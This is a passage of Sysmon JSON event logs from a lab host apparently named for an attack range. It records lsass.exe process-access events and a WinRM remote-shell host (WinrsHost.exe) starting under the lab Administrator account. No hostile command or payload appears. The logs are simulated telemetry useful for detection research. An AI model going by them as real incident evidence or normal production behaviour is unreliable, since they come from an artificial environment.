05:52:42.156","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5029,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.156\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.156","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5030,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.156\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.156","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5031,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5032,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5033,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5034,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.294\r\nProcessGuid: {A837DB8D-032A-5F25-0000-0010C2BE0900}\r\nProcessId: 1328\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.294","ProcessGuid":"{A837DB8D-032A-5F25-0000-0010C2BE0900}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-0010B4650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5035,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-0010C2BE0900}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-0010C2BE0900}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5036,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-0010C2BE0900}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 